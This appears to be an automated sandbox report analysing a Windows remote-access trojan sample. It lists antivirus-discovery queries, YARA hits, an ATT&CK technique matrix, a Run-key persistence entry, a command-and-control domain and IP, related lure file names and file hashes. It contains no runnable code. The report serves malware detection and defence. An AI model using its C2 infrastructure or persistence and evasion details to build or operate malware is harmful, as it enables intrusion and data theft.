        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: jqenyeo.exe, 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: jqenyeo.exe, 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Windows Management Instrumentation
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        1
        Disable or Modify Tools
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts11
        Native API
        Boot or Logon Initialization Scripts112
        Process Injection
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory2
        File and Directory Discovery
        Remote Desktop Protocol1
        Clipboard Data
        Exfiltration Over Bluetooth1
        Non-Standard Port
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        Registry Run Keys / Startup Folder
        2
        Obfuscated Files or Information
        Security Account Manager15
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Remote Access Software
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Software Packing
        NTDS141
        Security Software Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer1
        Non-Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets2
        Process Discovery
        SSHKeyloggingData Transfer Size Limits21
        Application Layer Protocol
        Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common21
        Virtualization/Sandbox Evasion
        Cached Domain Credentials21
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Access Token Manipulation
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
        Process Injection
        Proc Filesystem1
        Remote System Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
        Hidden Files and Directories
        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 628188 Sample: xeWd55M5Lb Startdate: 17/05/2022 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 7 other signatures 2->57 7 xeWd55M5Lb.exe 19 2->7         started        10 ltqmdmdi.exe 1 2->10         started        13 ltqmdmdi.exe 1 2->13         started        process3 file4 35 C:\Users\user\AppData\Local\...\jqenyeo.exe, PE32 7->35 dropped 15 jqenyeo.exe 1 3 7->15         started        59 Multi AV Scanner detection for dropped file 10->59 19 WerFault.exe 3 10 10->19         started        21 conhost.exe 10->21         started        23 WerFault.exe 10 13->23         started        26 conhost.exe 13->26         started        signatures5 process6 dnsIp7 39 C:\Users\user\AppData\...\ltqmdmdi.exe, PE32 15->39 dropped 45 Multi AV Scanner detection for dropped file 15->45 47 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->47 49 Injects a PE file into a foreign processes 15->49 28 jqenyeo.exe 12 15->28         started        33 conhost.exe 15->33         started        41 192.168.2.1 unknown unknown 23->41 file8 signatures9 process10 dnsIp11 43 stonecold.ddns.net 185.19.85.141, 2702, 49743, 49746 DATAWIRE-ASCH Switzerland 28->43 37 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 28->37 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->61 file12 signatures13

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        xeWd55M5Lb.exe49%VirustotalBrowse
        xeWd55M5Lb.exe49%ReversingLabsWin32.Trojan.LokiBot
        xeWd55M5Lb.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\jqenyeo.exe23%ReversingLabsWin32.Trojan.Pwsx
        C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe23%ReversingLabsWin32.Trojan.Pwsx
        SourceDetectionScannerLabelLinkDownload
        6.2.ltqmdmdi.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        17.0.ltqmdmdi.exe.400000.2.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        3.0.jqenyeo.exe.400000.0.unpack100%AviraHEUR/AGEN.1230484Download File
        3.0.jqenyeo.exe.400000.2.unpack100%AviraHEUR/AGEN.1230484Download File
        17.2.ltqmdmdi.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        3.0.jqenyeo.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.0.jqenyeo.exe.400000.3.unpack100%AviraHEUR/AGEN.1230484Download File
        3.0.jqenyeo.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.0.jqenyeo.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.0.jqenyeo.exe.400000.1.unpack100%AviraHEUR/AGEN.1230484Download File
        3.0.jqenyeo.exe.400000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        3.0.jqenyeo.exe.400000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        17.0.ltqmdmdi.exe.400000.1.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        1.2.jqenyeo.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        3.0.jqenyeo.exe.400000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        17.0.ltqmdmdi.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        stonecold.ddns.net0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        stonecold.ddns.net
        185.19.85.141
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          stonecold.ddns.nettrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_ErrorErrorxeWd55M5Lb.exefalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.19.85.141
            stonecold.ddns.netSwitzerland
            48971DATAWIRE-ASCHtrue
            IP
            192.168.2.1
            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:628188
            Start date and time: 17/05/202212:11:272022-05-17 12:11:27 +02:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 12s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:xeWd55M5Lb (renamed file extension from none to exe)
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:31
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@12/18@16/2
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 97.4% (good quality ratio 91%)
            • Quality average: 82.9%
            • Quality standard deviation: 28.2%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 47
            • Number of non-executed functions: 61
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.173, 20.54.89.106
            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            12:12:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
            12:12:53API Interceptor790x Sleep call for process: jqenyeo.exe modified
            12:12:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
            12:13:05API Interceptor2x Sleep call for process: WerFault.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            185.19.85.141RFQ-04983-00.docGet hashmaliciousBrowse
              Pricelist-MAY 2022.xlsxGet hashmaliciousBrowse
                Documento de recibo de DHL,pdf.exeGet hashmaliciousBrowse
                  Documento de recibo de DHL,pdf.exeGet hashmaliciousBrowse
                    q9or8b0xUp.exeGet hashmaliciousBrowse
                      Delivery Schedule March 23.xlsxGet hashmaliciousBrowse
                        KF2QdfL3od.exeGet hashmaliciousBrowse
                          0bsas7EJ1u.exeGet hashmaliciousBrowse
                            mKIxz8SpOI.exeGet hashmaliciousBrowse
                              j9g3S1wsKr.exeGet hashmaliciousBrowse
                                INDENT-88341.xlsxGet hashmaliciousBrowse
                                  PR # 1003693.xlsxGet hashmaliciousBrowse
                                    Urgent Purchase Order FEB22_76543.exeGet hashmaliciousBrowse
                                      PO#28-02-2022,pdf.exeGet hashmaliciousBrowse
                                        PO#24-02-2022,pdf.exeGet hashmaliciousBrowse
                                          Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exeGet hashmaliciousBrowse
                                            Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exeGet hashmaliciousBrowse
                                              Sat#U0131n Alma Sipari#U015fi FEB22_76543,pdf.exeGet hashmaliciousBrowse
                                                Skype.exeGet hashmaliciousBrowse
                                                  #461432638.exeGet hashmaliciousBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    stonecold.ddns.netPayslip_APR_2022.docGet hashmaliciousBrowse
                                                    • 45.132.226.1
                                                    RFQ-04983-00.docGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    Pricelist-MAY 2022.xlsxGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    q9or8b0xUp.exeGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    Delivery Schedule March 23.xlsxGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    KF2QdfL3od.exeGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    Pricelist and Catalogue.docGet hashmaliciousBrowse
                                                    • 197.210.55.14
                                                    0bsas7EJ1u.exeGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    j9g3S1wsKr.exeGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    INDENT-88341.xlsxGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    PR # 1003693.xlsxGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    GRIMME RFQ-20188.xlsxGet hashmaliciousBrowse
                                                    • 185.244.31.132
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    DATAWIRE-ASCHARRIVAL_NOTICE_BL_NO_607847370.pdf.vbsGet hashmaliciousBrowse
                                                    • 185.19.85.162
                                                    bntnigger.armGet hashmaliciousBrowse
                                                    • 185.19.84.192
                                                    RFQ-04983-00.docGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    doc_8646626921-81609948075.pdf.vbsGet hashmaliciousBrowse
                                                    • 185.19.85.162
                                                    doc_65398086_4190362045539.pdf.vbsGet hashmaliciousBrowse
                                                    • 185.19.85.162
                                                    hv1AggWX5O.exeGet hashmaliciousBrowse
                                                    • 185.19.85.172
                                                    Remittance Advice.xlsGet hashmaliciousBrowse
                                                    • 185.19.85.174
                                                    8v2E2Qu0iMFG7kx.exeGet hashmaliciousBrowse
                                                    • 185.19.85.175
                                                    P2DIWOtpLf.exeGet hashmaliciousBrowse
                                                    • 185.19.85.160
                                                    U7Ncg7oAyC.exeGet hashmaliciousBrowse
                                                    • 185.19.85.160
                                                    lg5wG9Xf5M.exeGet hashmaliciousBrowse
                                                    • 185.19.85.160
                                                    5JbQqP8SDG.exeGet hashmaliciousBrowse
                                                    • 185.19.85.175
                                                    attack.ps1Get hashmaliciousBrowse
                                                    • 185.19.85.174
                                                    Protected Client.vbsGet hashmaliciousBrowse
                                                    • 185.19.85.174
                                                    Protected Client.vbsGet hashmaliciousBrowse
                                                    • 185.19.85.174
                                                    attack.ps1Get hashmaliciousBrowse
                                                    • 185.19.85.174
                                                    Pricelist-MAY 2022.xlsxGet hashmaliciousBrowse
                                                    • 185.19.85.141
                                                    24pzwqvOw8.exeGet hashmaliciousBrowse
                                                    • 185.19.85.175
                                                    FTUthCr1fh.exeGet hashmaliciousBrowse
                                                    • 185.19.85.175
                                                    Dq6Qlhi724.exeGet hashmaliciousBrowse
                                                    • 185.19.85.175
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exePayslip_APR_2022.docGet hashmaliciousBrowse
                                                      C:\Users\user\AppData\Local\Temp\jqenyeo.exePayslip_APR_2022.docGet hashmaliciousBrowse
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9183344636214174
                                                        Encrypted:false
                                                        SSDEEP:192:bA6tZ8m+F/of8h8vHlnr+MPiejw0Gq/u7saS274It9872:ppzf2Wlr+MDjl/u7saX4It9r
                                                        MD5:203193D01FE8E6516E7DF6EB617F44FD
                                                        SHA1:3F9D49932DB1E09686C6961B504BFFD2BDA94DA7
                                                        SHA-256:0EAFF7194851F1B1D27E62E95EEEECBABB5A57A7A0F64753FED35D17C929EB2D
                                                        SHA-512:E4BC90019A580D2E7FB2F9337010AC209A9BD95936369FDF3C132EE4B4B5EC9DDC14F057EAEB2B9F79D2D06219A6B705C304A883F49EF85C8D89E717D8474DAA
                                                        Malicious:false
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.8.3.9.0.6.5.2.0.3.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.8.3.9.3.9.0.2.0.1.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.9.f.0.a.2.b.-.4.8.6.0.-.4.2.6.3.-.a.d.e.0.-.4.e.5.c.c.5.5.b.e.4.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.5.3.1.6.2.a.-.9.f.0.6.-.4.a.0.d.-.8.6.d.6.-.4.6.5.4.a.8.f.6.3.b.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.q.m.d.m.d.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.3.c.-.0.0.0.1.-.0.0.1.d.-.9.3.2.a.-.5.f.2.3.2.2.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.0.2.e.2.a.8.9.2.2.a.5.f.b.2.0.f.d.a.0.9.3.d.4.e.0.8.4.4.3.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.e.5.4.f.b.e.0.b.5.6.a.2.4.3.c.f.d.c.3.b.a.0.1.e.c.0.b.5.d.7.d.0.2.5.2.b.a.e.!.l.t.q.m.d.m.d.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2./.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9252964303133182
                                                        Encrypted:false
                                                        SSDEEP:192:TGhY8N+F/oQ8h8vHlnr+MPiejoP9q/u7saS274It9872:aaazQ2Wlr+MDjH/u7saX4It9r
                                                        MD5:F72417D7A8D0642F8420D1CAA1E9A3CC
                                                        SHA1:4D430B52AA4BA4360C2B4D3916AFFED7B40D7138
                                                        SHA-256:3ABC4DE1B80BF36B9C4A97B0265EFF6D0B424C3EFB0A7F8720480751C09DA8FF
                                                        SHA-512:FEE62465A46F8311B41D5EED87BB62AEF9629A28C34C950591C9E43C5DE257179C58D21BEB47C9A20705A99A270AB98D7B52A44940E14BA6A1836646AE5F8E00
                                                        Malicious:false
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.8.8.3.8.1.9.5.4.4.9.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.8.8.3.8.4.2.0.4.4.7.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.9.a.4.d.9.a.-.6.8.e.e.-.4.9.a.7.-.a.f.3.7.-.f.b.d.c.f.4.8.9.9.8.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.7.6.4.1.7.3.-.5.2.c.4.-.4.3.a.a.-.8.4.5.6.-.2.7.0.1.7.8.a.f.9.8.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.q.m.d.m.d.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.8.-.0.0.0.1.-.0.0.1.d.-.c.7.b.0.-.6.7.1.d.2.2.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.0.2.e.2.a.8.9.2.2.a.5.f.b.2.0.f.d.a.0.9.3.d.4.e.0.8.4.4.3.0.0.0.0.0.f.f.f.f.!.0.0.0.0.4.4.e.5.4.f.b.e.0.b.5.6.a.2.4.3.c.f.d.c.3.b.a.0.1.e.c.0.b.5.d.7.d.0.2.5.2.b.a.e.!.l.t.q.m.d.m.d.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2./.
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 14 streams, Tue May 17 19:13:03 2022, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):41694
                                                        Entropy (8bit):1.9443159663202554
                                                        Encrypted:false
                                                        SSDEEP:192:qgNFkO4rdiAyOc8a0J5R++ngovO5piqPdAPtuImTQHf:OrtcdMlg7fXPTQHf
                                                        MD5:AD6D568F9AED7786309AB7E98F31FEA6
                                                        SHA1:52820029DE26CD634AD7315E0436A725B350120F
                                                        SHA-256:4738DDBA5DB5919604FFCE1B84F0ADC6416B050EB78359100E173F44974B1A5A
                                                        SHA-512:7B5A0BA32E07FEF6524EBC77DC3F351B478D281FCF6CE104597D46D3EA2BE350D5E200947833E255A86E0F9B84320434B38E7A69E894C7F130E7B32C085C49EA
                                                        Malicious:false
